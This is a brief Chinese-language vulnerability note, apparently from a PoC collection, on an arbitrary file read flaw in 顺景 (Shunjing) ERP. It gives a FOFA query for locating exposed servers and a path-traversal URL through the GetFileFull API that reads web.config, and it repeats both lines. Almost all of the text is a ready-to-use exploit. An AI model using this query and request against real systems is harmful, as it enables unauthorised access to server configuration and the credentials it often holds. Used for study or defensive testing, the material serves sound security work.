顺景ERP 任意文件读取漏洞
fofa查询语句
body="/api/DBRecord/getDBRecords"
漏洞验证
漏洞链接:http://xx.xx.xx.xx/api/TMScmQuote/GetFileFullGuidFileName=/../web.config&FileName=
body="/api/DBRecord/getDBRecords"
漏洞链接:http://xx.xx.xx.xx/api/TMScmQuote/GetFileFullGuidFileName=/../web.config&FileName=